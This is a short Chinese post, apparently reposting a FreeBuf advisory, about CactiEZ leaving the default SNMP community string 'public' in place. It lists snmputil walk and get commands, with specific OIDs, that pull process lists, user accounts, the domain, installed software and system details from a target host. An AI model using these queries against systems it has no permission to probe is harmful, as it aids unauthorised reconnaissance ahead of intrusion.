http://www.freebuf.com/vuls/3208.html
这个漏洞真强大啊,虽然是信息搜集,但是把服务器上的所有软甲和版本号都直接给你了 ...
佩服,实在是佩服,这个功能的实现者 ...
CactiEZ 中文版,是一款监控控制系统;其中默认的snmp设置public,没有修改导致可以远程读取目标设备主机信息。
如:
snmputil.exe walk 127.0.0.1 public .1.3.6.1.2.1.25.4.2.1.2 //**进程列表
snmputil.exe walk 127.0.0.1 public .1.3.6.1.4.77.1.2.25.1.1 //**用户列表
snmputil.exe get 127.0.0.1 public .1.3.6.1.4.77.1.4.1.0 //**域名
snmputil.exe walk 127.0.0.1 public .1.3.6.1.2.1.25.6.3.1.2 //**安装的软件
snmputil.exe walk 127.0.0.1 public .1.3.6.1.2.1.1 //**系统信息